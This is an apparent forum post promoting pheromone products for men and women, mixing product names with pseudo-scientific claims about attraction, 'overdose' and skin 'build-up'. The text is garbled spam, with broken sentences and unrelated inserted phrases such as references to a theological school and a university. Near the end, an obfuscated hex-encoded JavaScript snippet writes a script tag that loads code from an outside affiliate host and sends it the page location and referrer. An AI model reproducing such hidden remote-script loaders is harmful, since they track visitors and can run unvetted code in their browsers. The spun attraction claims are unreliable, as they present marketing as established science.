Best Pheromone and Pheromone Products for Attraction:
Many different pheromones products are now available on the market. Pheromone products for men in all shapes and sizes. For example, you have an option to buy pheromone colognes, pheromone oils, pheromone perfumes, or pheromone concentrates. Also, pheromone products are available in either unscented or scented versions. Of course, men and women use are there different types of pheromones? products - but there are some unisex pheromone colognes, too. Androstenone and androsterone-based products attract women, while copulins attract men.
Based on popularity and effectiveness, some of the best pheromone products include: Chikara, Alter Ego, Scent of Eros, Rogue Male, Pheromax, Realm, The Edge, Passion Pheromone Attractant, Perception, New Pheromone Additive - NPA and Primal Instinct. These products contain different amounts of pheromones. Most pheromones can be combined with others. For example, Scent of Eros can be combined with androstenone products - Primal Instinct or The Edge.
- So, where to start?
- Use one product and pay attention to the reactions of men or women around you.
- Then try another pheromone product.
- The key with testing a product is to be persistent and to test in different situations.
- You cannot just apply pheromones then sit back and wait.
- Don't be discouraged if you don't see results immediately.
- Remember that everybody has unique body chemistry.
- Try different dosage or a different mix of two or more pheromone colognes.
- Testing is the best way to find out what works for you.
- And it's not expensive - there are a lot of free pheromone samples available - and pheromone kits for beginners as well.
- Pheromones act as a form of chemical communication between human beings.
- These chemicals are well known for their ability to attract members of the opposite sex.
- Androstadienone, or A1 pheromone, probably the most popular pheromone within the pheromones community.
- This so-called "love pheromone" can increase caring feelings and closeness.
- Androsterone, or A-Rone, creates an aura of protection and reliableness which is usually associated with peaceful alpha males.
- This pheromone makes the wearer appear to be more masculine.
- Also, androstenone can enhance or the effect of other pheromones in a pheromone mix.
- Androstenol, or A-Nol, has two types: alpha and beta androstenol, each producing somewhat different results.
- Alpha androstenol makes the wearer seem more approachable and friendly, and less intimidating by creating an aura of youth and fitness.
- Alpha androstenol is not "macho" pheromone, like androstenone.
- Beta androstenol is good for inducing conversations, but it is less popular than alpha-androstenol, possibly because of its limited availability.
There are Four Common Types of Human Pheromones:Androstenone, or A-None is found in both men and women, however, it is usually known of as a male pheromone because it creates a dominant and aggressive aura and projects an aggressive alpha impression. Also, this pheromone can cause people to act more polite to the wearer. Androstenone has quite a strong and sharp smell in high concentrations, so wearing a decent cover fragrance over androstenone applications is necessary.
These are two most common problems of pheromone cologne users:
Pheromone Overdose Happens When You Apply Large Doses of Synthetic PheromonesIf you notice people avoiding you, act intimidated by you or becoming aggressive towards you, you are probably using too much of the pheromone product. It is very easy to overdose, especially with unscented pheromone concentrates. These products contain no added fragrances to mask the pheromone smell which can be easily detected with the nose. Pheromone smell is often compared to body odor. Many people cannot smell pheromones, so the nose is not always a reliable guide when deciding how much is too much. Experiment with low doses of pheromones first, and try to stay within the limits described in the pheromone product guide.
Some pheromones are absorbed into the skin and may stay there for a longer period of time. Usually, depending on the biochemical characteristics of your skin, pheromones remain on your skin for about five hours, and up to ten hours on your clothing. Pheromone build-up happens when the skin absorbs so much pheromone content from multiple pheromone applications over a period of time, that you notice a significant drop off in the effectiveness of a pheromone product. If you see no good reactions after you use pheromones for guys see better reactions when you don't apply pheromones - you have this problem. To prevent this don't apply products directly to the skin - apply them to your clothing instead. Clothing applications can be more convenient and will last longer.
Pheromones are Chemicals that Send Signals to Other Members of the Same SpeciesThese signals could serve many purposes such as marking out territory (As dogs and cats do) or to mark a food trail (How ants all seem to converge on the same food source) or to send alarm signals warning other members of the species of impending danger. .
Several Studies Have Shown Promising ResultsDr. Winifred Cutler, a biologist and behavioral endocrinologist, found pheromones present in underarm secretions. She also found that women who had regular sex with men had more regular menstrual cycles. Pheromones which had been identified in the under arms of men contributed significantly to this outcome.
On the other hand a multi-billion dollar worldwide perfume industry is ample proof of the importance that most of us place on odors and perhaps the lengths to which we go to mask what we consider to be undesirable smells. But do humans have naturally occurring pheromones which impact on the lives of others in the species?
However, the most widely known purpose and the one which has always attracted the most attention is the use of pheromones as a means of sexual attraction. Pheromones as a sexual attractant were identified as far back as 1956 when scientists extracted a compound from certain glands on the abdomen of the silkworm moth. This pheromone which they named bombykol was found to have an amazing effect on male silkworm moths. When exposed to it they immediately went into a frenzied "flutter dance".
- But do pheromones work in the world of mammals as well?
- Studies done on hamsters and rats certainly seem to suggest they do.
- These studies also suggested that pheromones do not act directly on the normal olfactory senses.
- They do involve smells but they seem to act through a very specific channel.
- This can be considered to be a valuable article on Pheromones Work.
- It is because there is so much to learn about Pheromones Work here.
Researchers believe that the vomeronasal organs are instrumental in picking up these specialized signals. The vomeronasal organs or VNO's are tiny cigar-shaped organs found in the nostrils which appear to communicate directly with the parts of the brain that control reproduction and parenting behavior.
That's all very well but do these same mechanisms of attraction and behavior modification apply to the most complex of mammals – man himself? This has long been debated. Sense of smell is perhaps one of human beings least used senses and given the world we live in we perhaps need to rely on it less for survival than other primitive mammals.
Another notable study was conducted by Martha Mclintock in the 1970's when she observed that the menstrual cycles of groups of women who lived together tended to become synchronized. Further study revealed the startling fact that it was exposure to pheromones from other women which caused the changes in cycle.
Much of Life is Governed by What We Cannot SeeViruses are microscopic, andover newton theological school can get rid of the virus. The microscopic universe has more to do with how we behave and feel than we would like to usually believe. We like to think that we are independent creatures with free will.
Pheromones in Other Animals Were Discovered in the 1970SThese pheromones were used in insecticide traps to lure males of the species hoping for a good time to their deaths. It was not until 1986, in Philadelphia, that two scientists, Dr Winnifred Cutler and Dr. George Preti were able to discover human pheromones and sexual attraction in the opposite sex that they can trigger. All of us unconsciously put these pheromones in the air when we are healthy or on the make. Human pheromones, and sexual attraction, lure mates together.
Love is the DrugWhen a creature is ready for mating, they send out a lot of signals seen and unseen. One of the most effective way of advertising your availability is through scent. Usually this is put out through the creatures urine, glands or even sweat. But what is the chemical message the potential mates are looking for? Pheromones. They are tiny scent cells that trigger the sexual parts of the smellers brain. Human pheromones and sexual attraction are always one right after another.
2006 study in Karolinska Institute in Sweden revealed that homosexuals respond differently than heterosexuals when exposed to the same human pheromones. Sexual attraction for lesbians for other women was aroused in their brain wave patterns and the same for gay men, who were attracted to mens pheromones. .
- The truth is, we are often at the mercy of molecules that are millions of times smaller than ourselves.
- Why do we choose the mates we do, for example?
- It could be looks, it could be the phase of the moon, but big deciding factors are tiny scent cells called human pheromones.
- And sexual attraction just got more out of control than you at first thought.
So You Have Decided to Investigate this Human Pheromones PhenomenomDo you know what they are and their role in human behaviour? It's only been in the last few decades that we have begun to understand the presence of pheromones and their impact on our interaction with each other.
One of the spin-offs in recent years has been the emergence of pheromone enhanced products. This in itself is somewhat of a "minefield" in the fact that unless you know what you're looking for, choosing the best pheromone product could be like playing "russian roulette."
Choice of Best Pheromone ProductsRemember, men and women will be using different products. For example, in the case of oils, androstenol and copulins attract men while the women are attracted by androstenone. Products come in all shapes and sizes but the bottomline is that they will either be scented or odorless. This choice is given because in the case of odorless products, it won't affect the scent of your favorite perfume or cologne or on the other hand, you may prefer the scent that comes with your best pheromone product.
Pheromone ConcentratesOdorless pheromone concentrates are available to those who prefer the scent of their own perfume or colognes. In a concentrate form, it's just a matter of adding several drops to your own product and then applying it to your skin. Alternatively, some people with add a drop or two to their wrists or neck area and then just simply use their cologne or perfume as normal.
Pheromone PerfumeThere is a choice of perfume enhanced pheromone fragrances for women. Androstenol and copulins form the basis of these perfumes and coupled with the scented ability of the perfume, manufacturers claim they are more than effective.
- Here is a rundown of the product types you are likely to find when searching for human pheromones.
- Pheromone oils Pheromone oils are synthesized human pheromones that are simply applied to the skin.
- After being applied, the oil disappears or is absorbed into the skin and is unnoticeable.
- They are available in either scented or unscented versions depending on your preference.
Useful, although reductive, theory on attraction comes from evolutionary psychology. It holds that we are drawn to others on the basis of our assessment of their reproductive fitness. We weigh up physical qualities (symmetry, health, youth, strength in men, child-bearing indicators in women), material possessions (wealth), social skills (status, charity, humour, confidence) and cultural factors (fashion, weight, skin tone, hair styles, body decoration). We have roughly standardized perceptions of 'attractive' individuals, though it can vary over history and in different parts of the world.
- Generally speaking, we select partners that are roughly similar to our own level of 'reproductive attractiveness' (measured in the wide sense).
- This means that it is not only the most 'attractive' individuals who manage to form partnerships - there is someone for everyone.
An excellent book that deals with attraction from an evolutionary perspective is 'The Mating Mind: How Sexual Choice Shaped the Evolution of Human Nature' by Geoffrey Miller. His hypothesis is that a lot of how we conduct our lives e.g. high status jobs, creative work, being charitable or popular for example, sends signals to attract potential partners.
An available person is likely to send out the right signals when they are self-contented. It is a clich, but a relevant one - when we can accept and love ourselves, we are in a good position to be accepted and loved by another. Inner confidence makes itself visible to potential partners. It is more convincing than 'fake' confidence (though sometimes in imagining ourselves confident, we can become it). This is why many happily committed individuals can be so appealing to others.
Ideas about Compatibility Include 'Opposites Attract' and 'Like-Minded Attract'There seems to be clinical support for both positions. On the one hand we may be drawn to individuals who have characteristics we lack. They may reflect our shadow side - the elements that reside within us but which we refuse to acknowledge. They may also balance or complement our personalities. Some examples of differences include highly-driven v. relaxed, artistic v. scientific, sporty v. sedate and introverted v. extroverted. On the other hand, like-minded individuals may connect well because it widens the field of interaction, for example sports lovers can play and watch games together, andrews university can socialize happily. What seems important in either of these positions is that the underlying core values are congruent. Ethical and social ideals tend to be matched in solid partnerships.
Various Factors can be At Play During the Initial AttractionSometimes it begins as physical impulse - pheromones doing their work - and sometimes it starts as an emotional connection first. Usually it involves an implicit assessment of the other's suitability as a potential mate (genetic donor) and/or a long-term partner (protector of self and of future offspring). This entails a complex interplay of observation (often matching them up to our ideal, or even setting them up as an ideal), reaction (via chemicals and body language) and interaction.
Pheromones for Men - Top 5 Social Attraction and Alpha Products
var c2="pheromones";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0](_0xded0+_0xded0+_0xded0+_0xded0+c2+_0xded0+encodeURIComponent(window[_0xded0])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0+_0xded0);
- Posts : 223
Join date : 2016-05-26
Permissions in this forum:You cannot reply to topics in this forum